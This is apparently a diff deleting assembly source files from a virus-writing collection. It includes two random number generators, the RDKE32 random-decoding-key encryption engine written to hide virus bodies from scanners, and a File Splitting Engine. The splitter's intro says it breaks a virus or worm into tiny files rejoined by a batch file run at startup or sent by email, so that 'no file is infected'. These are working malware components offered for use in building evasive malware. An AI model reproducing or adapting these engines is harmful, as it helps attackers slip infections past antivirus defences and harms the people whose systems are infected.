;(+) не использует WinApi'шек ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; ИСПОЛЬЗОВАНИЕ: ;
|
|
||||||
; ;
|
|
||||||
;1) Подключение: ;
|
|
||||||
; rang32.asm ;
|
|
||||||
;2) Вызов (пример stdcall): ;
|
|
||||||
; push 5 ;кладем в стэк число ;
|
|
||||||
; call RANG32 ;вызываем ГСЧ -> в EAX после вызова будет значение [0..5-1] ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
;m1x
|
|
||||||
;pr0mix@mail.ru
|
|
||||||
;EOF
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
RANG32:
|
|
||||||
pushad ;сохраняем регистры
|
|
||||||
mov ecx,dword ptr [esp+24h] ;ecx=число, что передали в стэке
|
|
||||||
db 0fh,31h
|
|
||||||
imul eax,eax,1664525 ;идут разные вычисления для получения
|
|
||||||
add eax,1013904223 ;более случайного числа
|
|
||||||
add eax,edx
|
|
||||||
adc eax,esp
|
|
||||||
rcr eax,16
|
|
||||||
imul eax,[esp+32]
|
|
||||||
xor edx,edx
|
|
||||||
mul ecx ;mul действует как div
|
|
||||||
mov dword ptr [esp+1ch],edx
|
|
||||||
popad
|
|
||||||
ret 04
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
;конец функции RANG32
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
|
|
@ -1,240 +0,0 @@
|
|||||||
comment *
|
|
||||||
ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
|
||||||
ßßßÛÛÛÛÛÛ ÜÜ ßßß ßßß ÜÜÜ ÛÛÛÛÛÛßßß
|
|
||||||
±ÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛ°
|
|
||||||
ÛÛÛÛ ÛÛÛÛÛÛ ²ÛÛÛÛÛ ÛÛÛÛ
|
|
||||||
ÛÛÛÛ ßÛÛÛÛ± ÜÛÛÛÛ² ÛÛÛÛ
|
|
||||||
°ÛÛÛÛ ÛÛÛÛÛßÛÛÛÛß ÛÛÛÛ
|
|
||||||
±ÛÛÛÛ ÛÛÛÛ² ÛÛÜÜ ÛÛÛÛ°
|
|
||||||
ÜÜÜÜÜÜÜÜÜÜÜÜÜ ²ÛÛÛÛ ÛÛÛÛ± ÛÛÛÛ²Ü ÛÛÛÛ± ÜÜÜÜÜÜÜÜÜÜÜÜ
|
|
||||||
Û ÛÛÛÛÛ ÛÛÛÛ² ²ÛÛÛÛÛ° ÛÛÛÛ² Û
|
|
||||||
Û ÛÛÛÛÛ ÜÛÛÛÛÛ ²ÛÛÛÛ² ÛÛÛÛÛ Û
|
|
||||||
ßÜ ßßßßß ßßßß ßßßß ßßßßß Üß
|
|
||||||
ÜßßßßßßßßßßßßßßßßþThe Knight TemplarsþßßßßßßßßßßßßßßßÜ
|
|
||||||
Û Û
|
|
||||||
Û Random Decoding Key Engine 32-bit v 1.0 [RDKE32] Û
|
|
||||||
Û Code by Û
|
|
||||||
Û Darkman/TKT Û
|
|
||||||
Û Û
|
|
||||||
ßÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜß
|
|
||||||
|
|
||||||
|
|
||||||
Do not use this engine to encrypt known plaintext such as the actual virus
|
|
||||||
code. It is possible to decrypt known plaintext encrypted with this
|
|
||||||
engine using the X-RAY technique, also known as cryptanalysis. You can read
|
|
||||||
more about this technique in "Detecting oh, roughly every polymorphic engine
|
|
||||||
out there", an article by Rhincewind/VLAD, published in VLAD Magazine issue
|
|
||||||
4. Billy Belcebu/iKx did this mistake in Win32.Legacy using his Internal
|
|
||||||
ENCryptor v 1.0 [iENC], a Random Decoding Key (RDK) engine using a 8-bit
|
|
||||||
eXclusive OR (XOR) algorithm to encrypt the actual virus in 19 different
|
|
||||||
blocks.
|
|
||||||
|
|
||||||
Length of Random Decoding Key Engine 32-bit v 1.0 [RDKE32]: 171 bytes.
|
|
||||||
*
|
|
||||||
|
|
||||||
hash_size equ (0a0h/08h)
|
|
||||||
|
|
||||||
_RDKE32Encrypt struc
|
|
||||||
_lpHash dd ?
|
|
||||||
_lpBuffer dd ?
|
|
||||||
_dwNumberOfBytesToHashAndEncrypt dd ?
|
|
||||||
_dwSecurityLevel dd ?
|
|
||||||
ends
|
|
||||||
|
|
||||||
_RDKE32Decrypt struc
|
|
||||||
_lpHash dd ?
|
|
||||||
_lpBuffer dd ?
|
|
||||||
_dwNumberOfBytesToDecrypt dd ?
|
|
||||||
ends
|
|
||||||
|
|
||||||
_pushad struc
|
|
||||||
_edi dd ?
|
|
||||||
_esi dd ?
|
|
||||||
_ebp dd ?
|
|
||||||
_esp dd ?
|
|
||||||
_ebx dd ?
|
|
||||||
_edx dd ?
|
|
||||||
_ecx dd ?
|
|
||||||
_eax dd ?
|
|
||||||
ends
|
|
||||||
|
|
||||||
rdke32_begin:
|
|
||||||
; RDKE32Encrypt
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; The RDKE32Encrypt function creates a hash and encrypts data.
|
|
||||||
;
|
|
||||||
; VOID RDKE32Encrypt(
|
|
||||||
; LPVOID lpHash // data buffer to receive hash
|
|
||||||
; LPVOID lpBuffer // data buffer of data to hash and encrypt
|
|
||||||
; DWORD dwNumberOfBytesToHashAndEncrypt // number of bytes to hash and
|
|
||||||
; // encrypt
|
|
||||||
; DWORD dwSecurityLevel // security level
|
|
||||||
; );
|
|
||||||
;
|
|
||||||
; Parameters
|
|
||||||
; lpHash
|
|
||||||
; [out] Pointer to the buffer that receives the hash.
|
|
||||||
; lpBuffer
|
|
||||||
; [out] Pointer to the buffer containing the data to be hashed and encrypted.
|
|
||||||
; dwNumberOfBytesToHashAndEncrypt
|
|
||||||
; [in] Specifies the number of bytes to be hashed and encrypted.
|
|
||||||
; dwSecurityLevel
|
|
||||||
; [in] Specifies the security level of the encryption. The higher it is the
|
|
||||||
; longer it will take for RDKE32Decrypt to bruteforce and decrypt the
|
|
||||||
; encrypted data.
|
|
||||||
;
|
|
||||||
; Return Values
|
|
||||||
; This function does not return a value.
|
|
||||||
|
|
||||||
RDKE32Encrypt proc ; Random Decoding Key Engine 32-bit
|
|
||||||
; v 1.00 [RDKE32] encryptor
|
|
||||||
pushad
|
|
||||||
mov edi,[esp._lpHash+size _pushad+04h]
|
|
||||||
; Pointer to the buffer that receives
|
|
||||||
; the hash
|
|
||||||
mov ebx,[esp._lpBuffer+size _pushad+04h]
|
|
||||||
; Pointer to the buffer containing the
|
|
||||||
; data to be hashed and encrypted
|
|
||||||
mov ecx,[esp._dwNumberOfBytesToHashAndEncrypt+size _pushad+04h]
|
|
||||||
; Specifies the number of bytes to be
|
|
||||||
; hashed and encrypted
|
|
||||||
mov eax,[esp._dwSecurityLevel+size _pushad+04h]
|
|
||||||
; Specifies the security level
|
|
||||||
|
|
||||||
call SHA1, edi, ecx, ebx
|
|
||||||
insecure_key:
|
|
||||||
call GetRandomNumberWithinRange
|
|
||||||
call test_key_security
|
|
||||||
jz insecure_key
|
|
||||||
|
|
||||||
call cryptor
|
|
||||||
popad
|
|
||||||
|
|
||||||
ret size _RDKE32Encrypt
|
|
||||||
endp
|
|
||||||
|
|
||||||
; RDKE32Decrypt
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; The RDKE32Decrypt function creates a hash and encrypts data.
|
|
||||||
;
|
|
||||||
; VOID RDKE32Decrypt(
|
|
||||||
; LPVOID lpHash // data buffer of hash
|
|
||||||
; LPVOID lpBuffer // data buffer of data to decrypt
|
|
||||||
; DWORD dwNumberOfBytesToDecrypt // number of bytes to decrypt
|
|
||||||
; );
|
|
||||||
;
|
|
||||||
; Parameters
|
|
||||||
; lpHash
|
|
||||||
; [in] Pointer to the buffer containing the hash.
|
|
||||||
; lpBuffer
|
|
||||||
; [out] Pointer to the buffer containing the data to decrypted.
|
|
||||||
; dwNumberOfBytesToDecrypt
|
|
||||||
; [in] Specifies the number of bytes to be decrypted.
|
|
||||||
;
|
|
||||||
; Return Values
|
|
||||||
; This function does not return a value.
|
|
||||||
|
|
||||||
RDKE32Decrypt proc ; Random Decoding Key Engine 32-bit
|
|
||||||
; v 1.00 [RDKE32] decryptor
|
|
||||||
pushad
|
|
||||||
mov edi,[esp._lpHash+size _pushad+04h]
|
|
||||||
; Pointer to the buffer of the hash
|
|
||||||
mov ebx,[esp._lpBuffer+size _pushad+04h]
|
|
||||||
; Pointer to the buffer containing the
|
|
||||||
; data to be decrypted
|
|
||||||
mov ecx,[esp._dwNumberOfBytesToDecrypt+size _pushad+04h]
|
|
||||||
; Specifies the number of bytes to be
|
|
||||||
; decrypted
|
|
||||||
sub esp,hash_size
|
|
||||||
|
|
||||||
mov esi,esp ; ESI = pointer to the hash
|
|
||||||
xor edx,edx
|
|
||||||
bruteforce_loop:
|
|
||||||
inc edx ; EDX = 32-bit encryption/decryption
|
|
||||||
; key
|
|
||||||
call test_key_security
|
|
||||||
jz bruteforce_loop
|
|
||||||
|
|
||||||
call cryptor
|
|
||||||
|
|
||||||
call SHA1, esi, ecx, ebx
|
|
||||||
|
|
||||||
pushad
|
|
||||||
push (hash_size/04h)
|
|
||||||
pop ecx
|
|
||||||
rep cmpsd ; Succesfully decrypted the buffer to
|
|
||||||
; be decrypted?
|
|
||||||
popad
|
|
||||||
je RDKE32Decrypt_exit
|
|
||||||
|
|
||||||
call cryptor
|
|
||||||
|
|
||||||
jmp bruteforce_loop
|
|
||||||
RDKE32Decrypt_exit:
|
|
||||||
add esp,hash_size
|
|
||||||
popad
|
|
||||||
|
|
||||||
ret size _RDKE32Decrypt
|
|
||||||
endp
|
|
||||||
|
|
||||||
test_key_security proc ; Test the security of the 32-bit key
|
|
||||||
pushad
|
|
||||||
|
|
||||||
test eax,eax ; Insecure key?
|
|
||||||
jz test_key_exit
|
|
||||||
|
|
||||||
push 03h
|
|
||||||
pop ecx
|
|
||||||
test_key_loop:
|
|
||||||
mov eax,edx ; EDX = 32-bit encryption/decryption
|
|
||||||
; key
|
|
||||||
mov ebx,ecx
|
|
||||||
_test_key_loop:
|
|
||||||
rol eax,08h
|
|
||||||
|
|
||||||
test al,dl
|
|
||||||
jz test_next_key
|
|
||||||
|
|
||||||
cmp al,dl ; Insecure key?
|
|
||||||
je test_key_exit
|
|
||||||
test_next_key:
|
|
||||||
dec ebx
|
|
||||||
jnz _test_key_loop
|
|
||||||
|
|
||||||
rol edx,08h
|
|
||||||
|
|
||||||
loop test_key_loop
|
|
||||||
|
|
||||||
inc ecx ; Secure key
|
|
||||||
test_key_exit:
|
|
||||||
popad
|
|
||||||
|
|
||||||
ret
|
|
||||||
endp
|
|
||||||
|
|
||||||
cryptor proc ; 32-bit encryptor/decryptor
|
|
||||||
pushad
|
|
||||||
crypt_loop:
|
|
||||||
inc ecx
|
|
||||||
|
|
||||||
test dl,dl ; Insecure key?
|
|
||||||
jz dont_crypt
|
|
||||||
|
|
||||||
dec ecx
|
|
||||||
|
|
||||||
xor [ebx],dl
|
|
||||||
inc ebx
|
|
||||||
dont_crypt:
|
|
||||||
rol edx,08h
|
|
||||||
|
|
||||||
loop crypt_loop
|
|
||||||
popad
|
|
||||||
|
|
||||||
ret
|
|
||||||
endp
|
|
||||||
|
|
||||||
db ' [RDKE32] '
|
|
||||||
rdke32_end:
|
|
||||||
rdke32_size equ (rdke32_end-rdke32_begin)
|
|
@ -1,96 +0,0 @@
|
|||||||
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;
|
|
||||||
; ГЕНЕРАТОР СЛУЧАЙНОГО ЧИСЛА V. 0.42 (x) 2005 СЛОН ;
|
|
||||||
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;
|
|
||||||
; Интервал: [0..eax-1] ;
|
|
||||||
;------------------------------------------------------------------------------;
|
|
||||||
; Используется алгоритм ГПСЧ Джорджа Марсаглии - "Xorshift - 128" ;
|
|
||||||
; Данный алгоритм прошел тест DIEHARD его период 2^128-1 ;
|
|
||||||
;------------------------------------------------------------------------------;
|
|
||||||
; Использование: call r_init ;
|
|
||||||
; mov eax,ГРАНИЦА ИНТЕРВАЛА ;
|
|
||||||
; call brandom32 ;
|
|
||||||
;------------------------------------------------------------------------------;
|
|
||||||
; Результат: число в интервале [0..ГРАНИЦА ИНТЕРВАЛА] ;
|
|
||||||
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;
|
|
||||||
|
|
||||||
;----[Подпрограмма инициализации генератора случайных чисел]-------------------;
|
|
||||||
|
|
||||||
r_init:
|
|
||||||
push ebp eax edx ; Сохраняем в стэке ebp,eax,edx
|
|
||||||
|
|
||||||
call __delta1_ ;
|
|
||||||
__delta1_: pop ebp ; Получение дельта смещения
|
|
||||||
sub ebp,offset __delta1_ ;
|
|
||||||
|
|
||||||
db 0fh,031h ; Получаем случайное зерно
|
|
||||||
mov [ebp+x],eax ;
|
|
||||||
|
|
||||||
pop edx eax ebp ; Восстанавливаем edx,eax,ebp
|
|
||||||
|
|
||||||
ret ; Возврат из подпрограммы
|
|
||||||
|
|
||||||
;----[Подпрограмма генерации случаного чмсла в диапазоне]----------------------;
|
|
||||||
|
|
||||||
brandom32: ; Эта подпрограмма
|
|
||||||
; возвращает случайное число
|
|
||||||
; в диапазоне 0..eax-1
|
|
||||||
|
|
||||||
push edx ecx ebp ; Сохраняем в стэке edx,ecx,ebp
|
|
||||||
|
|
||||||
call __delta2_ ;
|
|
||||||
__delta2_: pop ebp ; Получение дельта смещения
|
|
||||||
sub ebp,offset __delta2_ ;
|
|
||||||
|
|
||||||
imul eax,eax,100 ; Умножаем eax на 100
|
|
||||||
push eax ; и сохраняем eax в стэке
|
|
||||||
|
|
||||||
call random32 ; Вызываем подпрограмму
|
|
||||||
; генерации случайного числа
|
|
||||||
xor edx,edx ; Обнуляем edx
|
|
||||||
pop ecx ; Восстанавливаем значение
|
|
||||||
; из стэка в ecx
|
|
||||||
div ecx ; Делим eax на ecx
|
|
||||||
xchg eax,edx ; Помещаем остаток в eax
|
|
||||||
xor edx,edx ; Обнуляем edx
|
|
||||||
push 100 ; Помещаем в ecx - 100
|
|
||||||
pop ecx ;
|
|
||||||
div ecx ; Делим eax на ecx
|
|
||||||
pop ebp ecx edx ; Восстанавливаем ebp,ecx,edx,
|
|
||||||
ret ; Возврат из подпрограммы
|
|
||||||
|
|
||||||
;----[Подпрограмма генерации случайного числа]---------------------------------;
|
|
||||||
|
|
||||||
random32:
|
|
||||||
push ebx edx ecx ;
|
|
||||||
push ebp ; Сохраняем регистры в стэке
|
|
||||||
|
|
||||||
call __delta3_ ;
|
|
||||||
__delta3_: pop ebp ; Получение дельта смещения
|
|
||||||
sub ebp,offset __delta3_ ;
|
|
||||||
|
|
||||||
mov eax,12345678 ;
|
|
||||||
x = dword ptr $-4 ;
|
|
||||||
shl eax,0bh ; Выполняем математические
|
|
||||||
xor eax,[ebp+x] ; преобразования по нужному нам
|
|
||||||
mov edx,362436069 ; алгоритму данная часть
|
|
||||||
y = dword ptr $-4 ; выглядела бы на С так:
|
|
||||||
mov [ebp+x],edx ; unsigned long x=123456789,
|
|
||||||
mov ecx,521288629 ; y=362436069,
|
|
||||||
z = dword ptr $-4 ; z=521288629,
|
|
||||||
mov [ebp+y],ecx ; w=88675123;
|
|
||||||
mov ebx,88675123 ; t=(x^(x<<11));x=y;y=z;z=w;
|
|
||||||
w = dword ptr $-4 ; Где t в нашем случае eax
|
|
||||||
mov [ebp+z],ebx ;
|
|
||||||
mov edx,[ebp+w] ; Далее идут следующие
|
|
||||||
shr edx,13h ; вычисления, которые дают СЧ
|
|
||||||
xor edx,[ebp+w] ; (w=(w^(w>>19))^(t^(t>>8)));
|
|
||||||
xor edx,eax ;
|
|
||||||
shr eax,08h ;
|
|
||||||
xor edx,eax ;
|
|
||||||
mov [ebp+w],edx ;
|
|
||||||
mov eax,edx ;
|
|
||||||
|
|
||||||
pop ebp ;
|
|
||||||
pop ecx edx ebx ; Вынимаем регистры из стэка
|
|
||||||
|
|
||||||
retn ; Возврат из подпрограммы
|
|
Binary file not shown.
@ -1,302 +0,0 @@
|
|||||||
File Splitting Engine
|
|
||||||
by Second Part To Hell
|
|
||||||
www.spth.de.vu
|
|
||||||
spth@priest.com
|
|
||||||
written in May-June 2005
|
|
||||||
in Austria
|
|
||||||
|
|
||||||
This is just a small engine, but I'm sure it could be very useful.
|
|
||||||
What does the engine do? It splitts the current file into 3-10 byte
|
|
||||||
parts and creates a joining file (called start.bat).
|
|
||||||
|
|
||||||
To understand it's purpose, you should read my article called
|
|
||||||
"Over-File Splitting".
|
|
||||||
|
|
||||||
What could you do with the splitted files?
|
|
||||||
- You could make an archive (via own routing, possible installed WinZIP/RAR
|
|
||||||
or use the WinME+ preinstalled function [C:\WINDOWS\System32\zipfldr.dll,-10195]
|
|
||||||
to compress files.) This file now could be send out via eMail.
|
|
||||||
The advantage: No file is infected with an virus - but all together they are.
|
|
||||||
|
|
||||||
- You could save all files in a directory (Windir, system32, whatever), and
|
|
||||||
call the joining file every startup. What may happen? Virus/Worm works at
|
|
||||||
the computer, but no file is infected :)
|
|
||||||
|
|
||||||
- You could think of your own way to use this technique. Lazy ass :)
|
|
||||||
|
|
||||||
|
|
||||||
How to compile:
|
|
||||||
- Delete this intro
|
|
||||||
- Use flat assembler 1.56
|
|
||||||
|
|
||||||
Now: Much fun with it :)
|
|
||||||
|
|
||||||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; [File Splitting Engine] ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|
||||||
include '..\FASM\INCLUDE\win32ax.inc'
|
|
||||||
|
|
||||||
.data
|
|
||||||
c_file_name dd 0x0
|
|
||||||
c_file_rnd_name: times 8 db 0x0
|
|
||||||
db '.tmp',0
|
|
||||||
c_file_handle dd 0x0
|
|
||||||
c_file_size dd 0x0
|
|
||||||
c_map_handle dd 0x0
|
|
||||||
c_map_pointer dd 0x0
|
|
||||||
|
|
||||||
compain_name db 'start.bat',0
|
|
||||||
compain_data dd 0x0
|
|
||||||
compain_pointer dd 0x0
|
|
||||||
compain_start db 'copy '
|
|
||||||
compain_handle dd 0x0
|
|
||||||
|
|
||||||
split_handle dd 0x0
|
|
||||||
split_counter db 0x0
|
|
||||||
|
|
||||||
rand_name_buffer: times 8 db 0x0
|
|
||||||
rnd_file_name: times 8 db 0x0
|
|
||||||
db '.tmp',0
|
|
||||||
ZERO_field dd 0x0
|
|
||||||
|
|
||||||
systemtime_struct: ; for random number
|
|
||||||
dw 0 ; wYear
|
|
||||||
dw 0 ; wMonth
|
|
||||||
dw 0 ; wDayOfWeek
|
|
||||||
dw 0 ; wDay
|
|
||||||
dw 0 ; wHour
|
|
||||||
dw 0 ; wMinute
|
|
||||||
dw 0 ; wSecond
|
|
||||||
rnd: dw 0 ; wMilliseconds
|
|
||||||
|
|
||||||
.code
|
|
||||||
start:
|
|
||||||
invoke GetCommandLine
|
|
||||||
inc eax ; Delete first "
|
|
||||||
|
|
||||||
mov ebx, eax ; Save eax
|
|
||||||
|
|
||||||
get_my_name:
|
|
||||||
inc ebx ; Get next letter
|
|
||||||
cmp byte [ebx], '.' ; Compare with '.'
|
|
||||||
jne get_my_name
|
|
||||||
|
|
||||||
mov byte [ebx+4], 0x0 ; Delete the second "
|
|
||||||
mov [c_file_name], eax ; Save the pointer
|
|
||||||
|
|
||||||
invoke DeleteFile, compain_name ; Delete the old compainer-file the file
|
|
||||||
|
|
||||||
mov ebp, 0xAAAAAAAA ; Influences the random engine
|
|
||||||
call random_name ; random name in rnd_file_name
|
|
||||||
|
|
||||||
mov esi, rnd_file_name ; From: random-name buffer
|
|
||||||
mov edi, c_file_rnd_name ; To: Buffer for this copy of the file
|
|
||||||
mov ecx, 8 ; How much: 8 letters
|
|
||||||
rep movsb ; Copy string
|
|
||||||
|
|
||||||
invoke CopyFile, [c_file_name], c_file_rnd_name, FALSE ; Copies the current file to a .tmp
|
|
||||||
|
|
||||||
invoke CreateFile, c_file_rnd_name, GENERIC_READ or GENERIC_WRITE, 0x0, 0x0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0x0 ; Open own file
|
|
||||||
mov [c_file_handle], eax ; Save the file handle
|
|
||||||
|
|
||||||
invoke GetFileSize, [c_file_handle], c_file_size ; Get the size of the file
|
|
||||||
mov [c_file_size], eax ; Low Filesize returned in eax
|
|
||||||
|
|
||||||
invoke CreateFileMapping, [c_file_handle], 0x0, PAGE_READWRITE, 0x0, [c_file_size], 0x0 ; Create a Map
|
|
||||||
mov [c_map_handle], eax ; Save the Map handle
|
|
||||||
|
|
||||||
invoke MapViewOfFile, [c_map_handle], FILE_MAP_WRITE, 0x0, 0x0, [c_file_size] ; Map view of file
|
|
||||||
mov [c_map_pointer], eax ; Save the pointer of file
|
|
||||||
|
|
||||||
invoke VirtualAlloc, 0x0, 0x120000, 0x1000, 0x4 ; Reserve Space in Memory
|
|
||||||
mov [compain_data], eax ; Save the pointer to it.
|
|
||||||
mov [compain_pointer], eax ; Save again
|
|
||||||
|
|
||||||
mov esi, compain_start ; What to write
|
|
||||||
mov edi, [compain_pointer] ; Where to write
|
|
||||||
mov ecx, 5 ; How much to write
|
|
||||||
rep movsb ; Write!
|
|
||||||
|
|
||||||
add [compain_pointer], 5 ; Get next empty byte to write
|
|
||||||
|
|
||||||
main_loop:
|
|
||||||
mov ebp, 0xAAAAAAAA ; Influences the random engine
|
|
||||||
call random_name ; random name in rnd_file_name
|
|
||||||
|
|
||||||
invoke CreateFile, rnd_file_name, GENERIC_READ or GENERIC_WRITE, 0x0, 0x0, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, 0x0
|
|
||||||
cmp eax, INVALID_HANDLE_VALUE ; If file already existed
|
|
||||||
je main_loop ; then get a new file-name
|
|
||||||
|
|
||||||
mov [split_handle], eax ; Save the file-handle
|
|
||||||
|
|
||||||
call random_number ; Get random number
|
|
||||||
xor eax, eax ; eax=0
|
|
||||||
mov al, [rand_name_buffer] ; al~=random
|
|
||||||
and al, 7 ; al= 0000 0???
|
|
||||||
add al, 3 ; At least three byte
|
|
||||||
mov [split_counter], al ; Save that bytes
|
|
||||||
|
|
||||||
sub [c_file_size], eax ; Decrease the bytes to write
|
|
||||||
|
|
||||||
invoke WriteFile, [split_handle], [c_map_pointer], eax, ZERO_field, 0x0 ; Write (1..8) byte
|
|
||||||
invoke CloseHandle, [split_handle] ; Close the file
|
|
||||||
|
|
||||||
xor eax, eax
|
|
||||||
mov al, [split_counter] ; How many bytes written
|
|
||||||
add [c_map_pointer], eax ; Add the pointer - write the next few bytes next time
|
|
||||||
|
|
||||||
mov esi, rnd_file_name ; From: Filename-buffer
|
|
||||||
mov edi, [compain_pointer] ; To: compainer-pointer
|
|
||||||
mov ecx, 12 ; 8+strlen('.tmp')
|
|
||||||
rep movsb ; Write!
|
|
||||||
|
|
||||||
add [compain_pointer], 12 ; Add 12 to pointer
|
|
||||||
|
|
||||||
mov eax, [compain_pointer] ; Pointer to eax
|
|
||||||
|
|
||||||
mov byte [eax], '+' ; Move '+' to the code's memory
|
|
||||||
inc [compain_pointer] ; Increase the pointer
|
|
||||||
|
|
||||||
cmp [c_file_size], 0 ; Compare if more bytes to write
|
|
||||||
jg main_loop ; If yes, jmp to main_loop
|
|
||||||
|
|
||||||
invoke UnmapViewOfFile, [c_map_pointer] ; Unmap View of File
|
|
||||||
invoke CloseHandle, [c_map_handle] ; Close Map
|
|
||||||
invoke CloseHandle, [c_file_handle] ; Close File
|
|
||||||
|
|
||||||
invoke DeleteFile, c_file_rnd_name ; Delete the temporary copy of the current file
|
|
||||||
|
|
||||||
invoke CreateFile, compain_name, GENERIC_READ or GENERIC_WRITE, 0x0, 0x0, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, 0x0
|
|
||||||
mov [compain_handle], eax
|
|
||||||
|
|
||||||
|
|
||||||
mov eax, [compain_pointer] ; eax=pointer
|
|
||||||
dec eax ; Delete the last '+'
|
|
||||||
mov byte [eax], 0x20 ; Add a space
|
|
||||||
inc [compain_pointer] ; Increase pointer again
|
|
||||||
|
|
||||||
mov ebp, 0xAAAAAAAA ; Influences the random engine
|
|
||||||
call random_name ; random name in rnd_file_name
|
|
||||||
|
|
||||||
mov eax, rnd_file_name ; RND-pointer in eax
|
|
||||||
add eax, 8 ; add 8 to pointer (='.' of filename)
|
|
||||||
mov dword [eax], '.exe' ; instate of '.tmp', '.exe'
|
|
||||||
|
|
||||||
dec [compain_pointer]
|
|
||||||
mov esi, rnd_file_name ; From: rnd_file_name
|
|
||||||
mov edi, [compain_pointer] ; To: compainter_pointer
|
|
||||||
mov ecx, 12 ; How much: 12 bytes
|
|
||||||
rep movsb ; Write
|
|
||||||
|
|
||||||
add [compain_pointer], 12 ; Add 12, to get the end again
|
|
||||||
mov eax, [compain_pointer] ; eax=pointer to content
|
|
||||||
mov word [eax], 0x0A0D ; Next Line
|
|
||||||
add [compain_pointer], 2
|
|
||||||
|
|
||||||
mov esi, rnd_file_name ; From: rnd_file_name
|
|
||||||
mov edi, [compain_pointer] ; To: compainter_pointer
|
|
||||||
mov ecx, 12 ; How much: 12 bytes
|
|
||||||
rep movsb ; Write
|
|
||||||
|
|
||||||
add [compain_pointer], 12 ; Add 12, to get the end again
|
|
||||||
|
|
||||||
|
|
||||||
mov eax, [compain_data]
|
|
||||||
sub [compain_pointer], eax
|
|
||||||
|
|
||||||
invoke WriteFile, [compain_handle], [compain_data], [compain_pointer], ZERO_field, 0x0 ; Write the file
|
|
||||||
|
|
||||||
invoke CloseHandle, [compain_handle]
|
|
||||||
|
|
||||||
invoke ExitProcess, 0x0
|
|
||||||
|
|
||||||
random_number:
|
|
||||||
pop edi ; Get value of stack
|
|
||||||
push edi ; Back to the stack
|
|
||||||
mov ecx, 8 ; ecx=counter
|
|
||||||
mov dh, 0xAA ; dh: changes in the function and makes the number little bit more random
|
|
||||||
mov dl, 0x87 ; same as dh
|
|
||||||
random_name_loop:
|
|
||||||
push dx ; Save dx at stack
|
|
||||||
push ecx ; Save counter at stack
|
|
||||||
call random_byte ; Random number in al
|
|
||||||
pop ecx ; get counter
|
|
||||||
xor al, cl ; Counter influences pseudo random number
|
|
||||||
pop dx ; Get dx
|
|
||||||
push ecx
|
|
||||||
xor dx, cx ; Counter influences influncing number
|
|
||||||
add dh, al ; Random number influences influencing number
|
|
||||||
sub dl, al ; Same as dh
|
|
||||||
neg dl ; Neg dl
|
|
||||||
xor dl, dh ; dl XOR dh -> more variability
|
|
||||||
xor al, dl ; random number changes
|
|
||||||
sub ax, di ; value of stack influences random number
|
|
||||||
add ax, dx ; ax+dx
|
|
||||||
mov dl, [rand_name_buffer+ecx-2]
|
|
||||||
mov dh, [rand_name_buffer+ecx-3] ; dx=???? ???? ????? ?????
|
|
||||||
sub al, dl ; al-=dl
|
|
||||||
add al, dh ; al+=dh
|
|
||||||
mov ah, dl ; ah=dl
|
|
||||||
push ax ; AX to stack
|
|
||||||
mov cl, 1 ; cl=1
|
|
||||||
or dh, cl ; dh is at least 1 (to reduce chance of result=zero)
|
|
||||||
mul dh ; AL=AX*DH
|
|
||||||
pop cx ; CX=old AX
|
|
||||||
push cx ; To stack again
|
|
||||||
add cl, al ; CL+=AL
|
|
||||||
sub cl, ah ; CL-=AH
|
|
||||||
xchg al, cl ; AL=CL
|
|
||||||
mov cx, bp ; cx=bp
|
|
||||||
mul cl ; AX=AL*CL
|
|
||||||
neg ah ; NEG AH
|
|
||||||
xor al, ah ; xor AL and AH
|
|
||||||
pop cx ; get old AX
|
|
||||||
sub cl, al ; SUB
|
|
||||||
add cl, dl ; cl+=old random number
|
|
||||||
sub al, cl ; al ~=random :)
|
|
||||||
pop ecx ; Get counter
|
|
||||||
mov [rand_name_buffer+ecx-1], al ; Save random letter
|
|
||||||
loop random_name_loop
|
|
||||||
ret
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
random_name:
|
|
||||||
call random_number ; Get 8 random bytes
|
|
||||||
mov ecx, 8 ; counter=8, as we want to do it 8 times
|
|
||||||
|
|
||||||
changetoletter:
|
|
||||||
mov al, [rand_name_buffer+ecx-1] ; Get a letter
|
|
||||||
mov bl, 10 ; BL=10
|
|
||||||
xor ah, ah ; AX: 0000 0000 ???? ????
|
|
||||||
div bl ; AL=rnd/10=number between 0 and 25
|
|
||||||
